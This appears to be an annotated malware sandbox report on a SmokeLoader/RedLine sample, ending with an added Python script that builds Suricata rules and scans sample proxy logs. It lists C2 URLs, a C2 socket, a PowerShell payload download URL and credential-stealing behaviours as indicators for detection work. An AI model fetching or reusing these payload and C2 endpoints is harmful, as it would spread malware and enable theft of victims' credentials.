Analysis
max time kernel: 152s
max time network: 142s
platform: windows10_x64
resource: win10-en-20211104
submitted: 02-12-2021 16:55
Static task: static1
Behavioral task: behavioral1
Sample: d0952af06d5f8ca8df078913d6e36d61e3b79c9aec03416042e5414497ecfc38.exe
Resource: win10-en-20211104
General
Target: d0952af06d5f8ca8df078913d6e36d61e3b79c9aec03416042e5414497ecfc38.exe
Size: 234KB
MD5: 8a9b7acd470f23cfbd45530fd1508683
SHA1: b7fc2e2d2567267b2f019d1ac034b06935158c6b
SHA256: d0952af06d5f8ca8df078913d6e36d61e3b79c9aec03416042e5414497ecfc38
SHA512: 8e6a26c2aac183ca32d23c0cc45ea7a7c8446b2569bd9470bba1cd6c30aedfd1dc4eea8c8ea2d0895d0f7b14adada19dffdf8d3b212de93ba34566c9c0402048
Malware Config

Extracted
URL: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Extracted
Family: smokeloader
Version: 2020
C2:
  http://rcacademy.at/upload/
  http://e-lanpengeonline.com/upload/
  http://vjcmvz.cn/upload/
  http://galala.ru/upload/
  http://witra.ru/upload/
  https://cinems.club/search.php
  https://clothes.surf/search.php

Extracted
Family: redline
Botnet: 1
C2: 45.9.20.59:46287
Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload 2 IoCs
Processes:
resource | yara_rule
behavioral1/memory/876-142-0x0000000004A80000-0x0000000004AAE000-memory.dmp | family_redline
behavioral1/memory/876-145-0x0000000007620000-0x000000000764C000-memory.dmp | family_redline
Both matches are memory regions of PID 876, which "Executes dropped EXE" below resolves to 8328.exe; the RedLine payload in this chain is therefore the dropped 8328.exe, not the submitted sample.
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Windows dir Microsoft Windows DOS prompt command exit OUTBOUND
-
suricata: ET MALWARE Windows route Microsoft Windows DOS prompt command exit OUTBOUND
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
The only net.exe invocations visible in the process tree below are "net accounts /domain" and "net share", which read account policy and share listings rather than change privileges; treat this signature as a net.exe-usage heuristic, not as evidence that privileges were modified.
-
Blocklisted process makes network request 9 IoCs
Processes:
flow | pid | process
107 | 2252 | powershell.exe
109 | 2252 | powershell.exe
110 | 2252 | powershell.exe
111 | 2252 | powershell.exe
113 | 2252 | powershell.exe
115 | 2252 | powershell.exe
117 | 2252 | powershell.exe
119 | 2252 | powershell.exe
121 | 2252 | powershell.exe
Flows 109, 110, 111 and 113 are the same flows listed under "Script User-Agent" below, so at least part of this PowerShell stage's traffic goes out through the WinHttp.WinHttpRequest.5 COM object.
Downloads MZ/PE file
-
Executes dropped EXE 5 IoCs
Processes:
pid | process
2208 | 3218.exe
896 | SmartClock.exe
1688 | 50CC.exe
876 | 8328.exe
1312 | CFF1.exe
Modifies RDP port number used by Windows 1 TTPs
-
Modifies Windows Firewall 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource | yara_rule
\Windows\Branding\mediasrv.png | upx
\Windows\Branding\mediasvc.png | upx
These are two of the files powershell.exe creates under C:\Windows\branding (see "Drops file in Windows directory" below); the matching rule is upx, i.e. they are UPX-packed executables despite the .png extension.
Deletes itself 1 IoCs
Processes:
pid | process
2264 | (not named in report)
Drops startup file 1 IoCs
Processes:
description | ioc | process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SmartClock.lnk | 3218.exe
Loads dropped DLL 2 IoCs
Processes:
pid | process
3768 | (not named in report)
3768 | (not named in report)
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | explorer.exe
Key opened | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | explorer.exe
Key opened | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | explorer.exe
The 9375CFF0413111d3B88A00104B2A6676 subkey is the MAPI profile section in which Outlook stores account settings, including stored mail-server credentials, which is why stealers read it. The reader here is explorer.exe, not one of the dropped binaries, which is consistent with code having been injected into explorer (compare the explorer.exe entries under "Suspicious behavior: MapViewOfSection").
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in Program Files directory 4 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT | powershell.exe
File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI | powershell.exe
File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT | powershell.exe
File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI | powershell.exe
These four files belong to the same Internet Settings initialisation that writes the Advanced INF Setup\IE40.UserAgent and IE.HKCUZoneInfo RegBackup keys under HKU\S-1-5-20 (see "Modifies data under HKEY_USERS"); they are first-use housekeeping for the NETWORK SERVICE profile, not a payload drop.
Drops file in Windows directory 19 IoCs
Processes:
description | ioc | process
File created | C:\Windows\branding\mediasvc.png | powershell.exe
File opened for modification | C:\Windows\branding\Basebrd | powershell.exe
File opened for modification | C:\Windows\branding\mediasvc.png | powershell.exe
File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_jakwdqzk.1jj.psm1 | powershell.exe
File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_aovvc3sr.1xv.ps1 | powershell.exe
File created | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP | powershell.exe
File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI3F42.tmp | powershell.exe
File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI408D.tmp | powershell.exe
File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat | powershell.exe
File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI3FB1.tmp | powershell.exe
File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI3FB2.tmp | powershell.exe
File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI40EC.tmp | powershell.exe
File created | C:\Windows\branding\mediasrv.png | powershell.exe
File created | C:\Windows\branding\wupsvc.jpg | powershell.exe
File opened for modification | C:\Windows\branding\ShellBrd | powershell.exe
File opened for modification | C:\Windows\branding\mediasrv.png | powershell.exe
File opened for modification | C:\Windows\branding\wupsvc.jpg | powershell.exe
File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | powershell.exe
Two things stand out. First, every profile-relative path is under C:\Windows\ServiceProfiles\NetworkService, so this powershell.exe runs as NETWORK SERVICE, i.e. from a service, not from the Admin desktop session. Second, the __PSScriptPolicyTest_*.ps1/.psm1, StartupProfileData-NonInteractive and CLR UsageLogs entries are routine PowerShell start-up artefacts; the payload-related writes are the three image-named files (mediasvc.png, mediasrv.png, wupsvc.jpg) placed in C:\Windows\branding, two of which match the upx yara rule above.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
In this run the most likely trigger is the "wmic ... Win32_Volume ..." query in the cmd.exe fingerprinting batch shown in the process tree, which is profiling for a loader/stealer; nothing else in the report (no mass file modification, no ransom note) points to ransomware.
Program crash 1 IoCs
Processes:
pid | pid_target | process | target process
2252 | 3836 | WerFault.exe | DllHost.exe
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
The subkeys under Enum\SCSI carry the vendor and model strings of attached disks, so a single key enumeration reveals a virtualised disk controller. Both the submitted sample and the dropped 50CC.exe perform the same open/query/enumerate sequence.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 50CC.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 50CC.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 50CC.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | d0952af06d5f8ca8df078913d6e36d61e3b79c9aec03416042e5414497ecfc38.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | d0952af06d5f8ca8df078913d6e36d61e3b79c9aec03416042e5414497ecfc38.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | d0952af06d5f8ca8df078913d6e36d61e3b79c9aec03416042e5414497ecfc38.exe
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Gathers network information 2 TTPs 4 IoCs
Uses commandline utility to view network configuration.
Processes:
pid | process
736 | ipconfig.exe
2208 | NETSTAT.EXE
2764 | NETSTAT.EXE
1532 | ipconfig.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Main | IEXPLORE.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{70D81563-55EC-11EC-B34F-EA93EE369050} = "0" | iexplore.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1" | (not named in report)
Key created | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\SOFTWARE\Microsoft\Internet Explorer\Main | (not named in report)
Key created | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Main | iexplore.exe
These are stock Internet Explorer first-run values written by iexplore.exe (PID 968) and IEXPLORE.EXE (PID 1588); the one entry worth noting is DisableFirstRunCustomize = "1", which is set by an unnamed process before IE starts and suppresses the first-run dialog so the browser can be driven silently.
Modifies data under HKEY_USERS 64 IoCs
All 64 entries are under S-1-5-20, the well-known SID of NT AUTHORITY\NETWORK SERVICE, and are the WinINet zone map, certificate-store and IE user-agent backup keys that Windows initialises the first time an account uses WinHTTP/WinINet. The values themselves are defaults; the finding is that powershell.exe is executing as NETWORK SERVICE, which matches the ServiceProfiles\NetworkService paths under "Drops file in Windows directory" and is consistent with the "Sets DLL path for service in the registry" signature.
Processes:
description | ioc | process
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2 | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\ | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent," | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\ | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | powershell.exe
Modifies registry class 2 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance | (not named in report)
Key created | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance | (not named in report)
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description | flow | ioc
HTTP User-Agent header | 109 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 110 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 111 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 113 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
This is the default User-Agent that the WinHttp.WinHttpRequest.5.1 COM object sends when a script does not set one; flows 109 to 113 are attributed to powershell.exe PID 2252 under "Blocklisted process makes network request" above. Browsers never send this string, so it is a low-noise proxy-log indicator on its own.
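The extracted configuration (SmokeLoader C2 URLs, RedLine socket) and the User-Agent above are the raw material for network detection. The following is an added example, not sandbox output and not code from any tool named on this page: it takes the indicators exactly as this report lists them, emits Suricata rules for them (TLS SNI matching for the two HTTPS C2s, because the URI is encrypted; Suricata-escaped content for the User-Agent, which contains semicolons) and runs the same indicators over a few constructed proxy-log lines. The log line format (timestamp, client, method, target, User-Agent), the sid range and the class types are assumptions.

```python
"""Network detection content from the extracted config (added example, not sandbox output)."""
from urllib.parse import urlparse

# Indicators copied from the "Malware Config" and "Script User-Agent" sections of the report.
SMOKELOADER_C2 = [
    "http://rcacademy.at/upload/",
    "http://e-lanpengeonline.com/upload/",
    "http://vjcmvz.cn/upload/",
    "http://galala.ru/upload/",
    "http://witra.ru/upload/",
    "https://cinems.club/search.php",
    "https://clothes.surf/search.php",
]
REDLINE_C2 = ("45.9.20.59", 46287)
SCRIPT_UA = "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"


def suri_escape(text):
    """Escape the characters Suricata does not allow unescaped inside content:"...": \\ " ;"""
    return text.replace("\\", "\\\\").replace('"', '\\"').replace(";", "\\;")


def suricata_rules(base_sid=9000001):
    """One rule per indicator. HTTP C2s match on host + URI, HTTPS C2s can only be
    matched on the TLS SNI, the RedLine C2 is a raw TCP socket. sid range is assumed."""
    rules, sid = [], base_sid
    for url in SMOKELOADER_C2:
        u = urlparse(url)
        host, path = suri_escape(u.hostname), suri_escape(u.path)
        if u.scheme == "http":
            rules.append(
                f'alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"SmokeLoader C2 {host}{path}"; '
                f'flow:established,to_server; http.host; content:"{host}"; nocase; '
                f'http.uri; content:"{path}"; classtype:trojan-activity; sid:{sid}; rev:1;)'
            )
        else:
            rules.append(
                f'alert tls $HOME_NET any -> $EXTERNAL_NET any (msg:"SmokeLoader C2 TLS SNI {host}"; '
                f'flow:established,to_server; tls.sni; content:"{host}"; nocase; endswith; '
                f'classtype:trojan-activity; sid:{sid}; rev:1;)'
            )
        sid += 1
    ip, port = REDLINE_C2
    rules.append(
        f'alert tcp $HOME_NET any -> {ip} {port} (msg:"RedLine C2 {ip}:{port}"; '
        f'flow:to_server; classtype:trojan-activity; sid:{sid}; rev:1;)'
    )
    ua = suri_escape(SCRIPT_UA)  # the UA contains ';', which must be escaped in a rule
    rules.append(
        f'alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"WinHttpRequest script User-Agent"; '
        f'flow:established,to_server; http.user_agent; content:"{ua}"; '
        f'classtype:policy-violation; sid:{sid + 1}; rev:1;)'
    )
    return rules


def host_port(target):
    """Host and port of a proxy target: a full URL for GET/POST, host:port for CONNECT."""
    if "://" in target:
        u = urlparse(target)
        return (u.hostname or "").lower(), u.port
    host, _, port = target.rpartition(":")
    return host.lower(), (int(port) if port.isdigit() else None)


def match_proxy_log(lines):
    """Scan proxy-log lines '<timestamp> <client> <method> <target> <user-agent>'
    (an assumed format) and return one hit per line with the indicators it matched."""
    c2_hosts = {urlparse(u).hostname: u for u in SMOKELOADER_C2}
    hits = []
    for line in lines:
        parts = line.split(None, 4)
        if len(parts) < 4:
            continue  # malformed line, skip it rather than crash the scan
        ts, client, method, target = parts[:4]
        ua = parts[4] if len(parts) == 5 else ""
        host, port = host_port(target)
        reasons = [f"SmokeLoader C2 {url}" for c2, url in c2_hosts.items()
                   if host == c2 or host.endswith("." + c2)]
        if (host, port) == REDLINE_C2:
            reasons.append("RedLine C2 socket")
        if ua == SCRIPT_UA:
            reasons.append("WinHttpRequest User-Agent")
        if reasons:
            hits.append({"ts": ts, "client": client, "method": method,
                         "target": target, "reasons": reasons})
    return hits


# Constructed proxy-log lines for the demo; this is not traffic captured from the sandbox run.
SAMPLE_LOG = [
    "2021-12-02T16:57:01Z 10.0.0.15 POST http://rcacademy.at/upload/ Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)",
    "2021-12-02T16:57:04Z 10.0.0.15 GET https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)",
    "2021-12-02T16:57:09Z 10.0.0.15 CONNECT 45.9.20.59:46287 -",
    "2021-12-02T16:57:12Z 10.0.0.22 GET http://example.com/ Mozilla/5.0",
    "2021-12-02T16:57:20Z 10.0.0.15 CONNECT cinems.club:443 -",
]

if __name__ == "__main__":
    for rule in suricata_rules():
        print(rule)
    for hit in match_proxy_log(SAMPLE_LOG):
        print(hit["ts"], hit["client"], hit["target"], "->", ", ".join(hit["reasons"]))
```

The second sample line is deliberately the raw.githubusercontent.com fetch: the host is far too common to block, so the only signal on that line is the User-Agent, which is why it is kept as a separate, lower-severity rule. The RedLine socket is only visible to a proxy as a CONNECT target, and on the wire only to the tcp rule.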
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
pid | process
896 | SmartClock.exe
A clipboard-change listener in a binary that persists through a Startup .lnk (see "Drops startup file") is the usual footprint of a clipper; whether SmartClock.exe rewrites clipboard contents is not shown in this report.
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid | process | entries
2368 | d0952af06d5f8ca8df078913d6e36d61e3b79c9aec03416042e5414497ecfc38.exe | 2
2264 | (not named in report) | 62
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid | process
2264 | (not named in report)

Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid | process
620 | (not named in report)
620 | (not named in report)
Suspicious behavior: MapViewOfSection 58 IoCs
Processes:
pid | process | entries
2368 | d0952af06d5f8ca8df078913d6e36d61e3b79c9aec03416042e5414497ecfc38.exe | 1
1688 | 50CC.exe | 1
2264 | (not named in report) | 16
820 | explorer.exe | 2
1944 | explorer.exe | 2
3404 | explorer.exe | 2
2120 | explorer.exe | 2
3616 | explorer.exe | 4
504 | explorer.exe | 28
In the original order the PID 2264 entries are interleaved before each new explorer.exe PID (820, 1944, 3404, 2120, 3616, 504), i.e. the unnamed process maps a section, a fresh explorer.exe instance maps one, and so on; that pattern is consistent with repeated injection into newly started explorer.exe processes, and it is these explorer.exe instances that later read the Outlook profile keys.
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
description | pid | process
Token: SeShutdownPrivilege | 2264 | (not named in report)
